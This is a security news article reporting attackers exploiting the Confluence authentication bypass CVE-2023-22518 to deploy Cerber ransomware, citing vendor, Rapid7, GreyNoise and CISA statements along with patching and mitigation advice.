Attackers have begun to exploit a critical authentication bypass vulnerability in Atlassian Confluence, using it to encrypt the files of victims with Cerber ransomware. Atlassian has identified this flaw as an improper authorization vulnerability and it has been assigned the identifier CVE-2023-22518. This vulnerability, rated 9.1 out of 10 in severity, affects all versions of Confluence Data Center and Confluence Server software. The company released security updates last week and urged administrators to immediately patch any vulnerable instances, as the flaw could also be used to erase data.
Atlassian's Chief Information Security Officer (CISO), Bala Sathiamurthy, stated, "As part of our continuous security assessment processes, we have discovered that Confluence Data Center and Server customers are vulnerable to significant data loss if exploited by an unauthenticated attacker," and emphasized that while there were no reports of active exploitation at the time, "customers must take immediate action to protect their instances."
Atlassian issued another warning a few days later, notifying customers that a proof-of-concept exploit was already available online, although there was no evidence of ongoing exploitation. The company advised those who couldn't immediately patch their systems to implement mitigation measures, such as backing up unpatched instances and blocking Internet access to unpatched servers until they could be secured.
According to data from ShadowServer, a threat monitoring service, there are currently over 24,000 Confluence instances exposed online. However, it's unclear how many of these are vulnerable to CVE-2023-22518 attacks. Atlassian updated their advisory last Friday, warning that threat actors were already targeting the vulnerability.
Over the weekend, GreyNoise, a threat intelligence company, warned of widespread exploitation of CVE-2023-22518 starting on Sunday, November 5. Rapid7, a cybersecurity company, also reported observing attacks against Internet-exposed Atlassian Confluence servers, with exploits targeting both the CVE-2023-22518 authentication bypass and an older critical privilege escalation vulnerability, CVE-2023-22515.
Rapid7 stated, "As of November 5, 2023, Rapid7 Managed Detection and Response (MDR) is observing exploitation of Atlassian Confluence in multiple customer environments, including for ransomware deployment." The company observed post-exploitation command execution to download a malicious payload, which, if successful, led to single-system Cerber ransomware deployment on the exploited Confluence server.
Last month, CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) issued a joint advisory, urging administrators to secure Atlassian Confluence servers against the actively exploited CVE-2023-22515 privilege escalation bug. According to a Microsoft report, this bug has been under active exploitation since at least September 14. Cerber ransomware was also used in attacks targeting Atlassian Confluence servers two years ago, exploiting a remote code execution vulnerability, CVE-2021-26084, which had previously been used to install crypto-miners.